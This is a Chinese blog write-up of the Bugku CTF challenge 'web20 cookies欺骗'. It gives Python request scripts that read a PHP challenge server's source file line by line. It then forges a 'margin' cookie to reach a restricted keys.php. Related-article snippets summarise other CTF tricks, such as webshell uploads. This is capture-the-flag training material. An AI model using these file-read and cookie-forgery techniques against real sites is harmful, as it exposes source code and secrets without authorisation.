【bugku】web20 cookies欺骗

最新推荐文章于 2024-03-12 22:42:04 发布
最新推荐文章于 2024-03-12 22:42:04 发布
阅读量381 收藏
点赞数
分类专栏: Web刷题记录 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/111316585
版权

题目

进入题目看到url

http://114.67.246.176:17939/index.php?line=&filename=a2V5cy50eHQ=

很熟眼,line功能应该就是行数,filename就是base64加密后的文件,放进get读取文件
试试读index.php
在这里插入图片描述
可以读,换下行数也可以读出来剩下的,但我选择用脚本

import requests
def fun(num):
    session = requests.Session()
    headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Cache-Control":"max-age=0","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0","Connection":"keep-alive","Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding":"gzip, deflate"}
    cookies = {"PHPSESSID":"ldo37io8vtliadt76v2bv8mf43"}
    paramsGet = {"line":num,"filename":"aW5kZXgucGhw"} //index.php的base64密文 
    response = session.get("http://114.67.246.176:17939/index.php", params=paramsGet, headers=headers, cookies=cookies)
    print(response.text)
for i in range(0,30):
    fun(i)

读取出来的源码,美化后

<?php
error_reporting(0);
$file = base64_decode(isset($_GET['filename']) ? $_GET['filename'] : "");
$line = isset($_GET['line']) ? intval($_GET['line']) : 0;
if ($file == '') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' => 'keys.txt',
    '1' => 'index.php',
);
if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin') {
    $file_list[2] = 'keys.php';
}
if (in_array($file, $file_list)) {
    $fa = file($file);
    echo $fa[$line];
}
?>

说的是只要cookie里面有"margin":"margin",就会在数组里面加上keys.php,那我们可以把目标放到keys.php上

import requests
def fun(num):
    session = requests.Session()
    headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Cache-Control":"max-age=0","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0","Connection":"keep-alive","Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding":"gzip, deflate"}
    cookies = {"PHPSESSID":"ldo37io8vtliadt76v2bv8mf43","margin":"margin"}
    paramsGet = {"line":num,"filename":"a2V5cy5waHA="} //keys.php的base64密文
    response = session.get("http://114.67.246.176:17939/index.php", params=paramsGet, headers=headers, cookies=cookies)
    print(response.text)
for i in range(0,30):
    fun(i)

在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
10-29
【标题】: "防范Cookies欺骗漏洞的策略与实践(vbs+js实现)" 【描述】: 本文探讨了如何防范ASP开发中的Cookies欺骗漏洞,通过VBS(Visual Basic Script)和JS(JavaScript)代码示例,阐述了从依赖不安全Cookies...
BugKu web20 cookies欺骗
m0_49762339的博客
12-24 545
BugKu web20 cookies欺骗 ①打开页面发现一堆乱码什么意思也不知道。然后看到url有两个参数(line=&filename=a2V5cy50eHQ=) ②其中一个是“a2V5cy50eHQ=”base64解码后是“keys.txt”,然后盲猜line是行数。这时就想看看index.php(base64后为aW5kZXgucGhwCg==) ③然后给file参数1,2,3……发现出现了代码。这时就想到爬虫来帮忙收集代码 废话不多说直接上代码: import requests for i
Bugku web20 Cookies欺骗
weixin_44522540的博客
02-23 275
十六、web20 Cookies欺骗 这道题url很有意思,文件名是经过base64编码的,解码a2v…后是keys.txt,尝试输出keys.txt的第10行,没有输出。。fine,题目给的一串字符串应该是keys.txt里的,具体多少行就不知道了。试下输出index.php的第10行(为什么是第10行呢,我随便输的hhh)记得将index.php编码 /index.php?line=10&filename=aW5kZXgucGhw //index.php base64编码=aW5kZXgucG
Bugkuweb cookies欺骗
qq_26961571的博客
07-10 252
​ 打开这道题。 发现全是一堆乱码!!马上打开源代码进行查看。 也是一堆乱码!!!一点头绪没有。 直到发现了网页的链接有问题,比普通的网页多出来了line,filename??? 哦吼,所以这里有猫腻。 用base64解码之后发现filename=keys.txt 尝试使用index.php看看有没有源代码,但是依然要用base64加密index.php才可以打开。 打开之后发现一片空白,后来在line=后面添加数字之后就出现了源...
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 301
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
BUGKU-WEB cookies
最新发布
天泽岁月
03-12 1192
BUGKU-WEB cookie欺骗
bugku web cookies欺骗
weixin_43928140的博客
05-20 723
记录菜鸡生活的第十二天 首先打开题目时一串字符串了 开始没啥想法,但是注意到了后面的url然后拿去解密,发现是keys.txt,放上去试一下 发现没有内容了,然后再思考一下,看这个url里面?后面有两个参数,一个line一个filename,然后filename后面是用的base64编码格式,就感觉filename传递的就是 base64密文格式,然后u传给后台的base64.decode()...
BugKucookies 欺骗
qq_39368007的博客
06-09 1438
查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处index.php要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在30 import...
BugkuCTF web20_cookies欺骗 writeup
Mitchell_Donovan的博客
01-14 507
web20_cookies欺骗 原题链接 key:python脚本+修改cookies+base64加密访问 ①题目环境里显示一大长串神秘英文???? 查看源码后没有线索 但是观察URL发现参数filename的值经过了base64加密 拿去解密,结果是keys.txt ②大胆猜想,或许能得到源码 于是尝试修改参数filename=index.php 值得注意的是,此处index.php要用base64加密为aW5kZXgucGhw 回车发现啥也没有。。。 这才发现原来UR
cookie 修改欺骗必备工具
12-29
对于网络安全专业人员来说,掌握Cookie修改和欺骗技术能提高对Web应用安全性的理解。然而,这也提醒了开发者和网站管理员,需要强化安全措施,如使用HTTPS加密通信、实施CSRF(跨站请求伪造)防护、限制Cookie的有效...
Python3实现Web网页图片下载
12-24
先来介绍一些python web编程基础知识 1. GET与POST区别 1)POST是被设计用来向web服务器上放东西的,而GET是被设计用来从服务器取东西的,GET也能够向服务器传送较少的数据,而Get之所以也能传送数据,只是用来设计...
bugkuweb30 (伪协议data://text/plain,)
EC_Carrot的博客
12-23 3386
<?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> 题目需要传入ac与fn内容一致,有2个解题方法在bugku里 解法一: ?ac=bugku&fn=
[GXYCTF2019]BabyUpload(典型图片马基础绕过流程)
EC_Carrot的博客
11-05 2157
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! [GXYCTF2019]BabyUpload 这题坑了我一小会,我就在想这都能坑到我,真的是太年轻了(`-д-;)ゞ 试了一下gif,jpg用不了,png是可以的 上传php提示不能上传后缀名带ph的文件 再测试上传.htaccess文件 发现改type为image/jpeg能上传成功 到这里不难猜出是图片马getshell了 拿蚁剑连马拿fla
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1871
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
[安洵杯 2019]easy_web(MD5强碰撞绕过)
EC_Carrot的博客
11-06 1589
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! [安洵杯 2019]easy_web 点进去就看到这个url,cmd传入ls、dir没什么用 img这边把他删了,图片就没了 那这里应该可以利用来读文件了,但是他加密过了,看起来像base64,解下密 看起来也像base64,再来一次 这次就解出个像hex编码的字符串了,解密后得出文件名 555.png 那我们知道这的确是文件名经过加密后传入
[MRCTF2020]你传你马呢 上传.htaccess
EC_Carrot的博客
10-27 1548
[MRCTF2020]你传你????呢 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! .htaccess文件简介: .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apach
理解与测试WebCookies技术
“GUI测试检查列表:理解Web饼干的原理与测试方法” 在Web开发中,用于文件交换的协议是无状态的,但大多数网站需要保持状态以实现功能。为了解决这个问题,开发者常使用“cookies”来维护状态。本文旨在提供技术...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值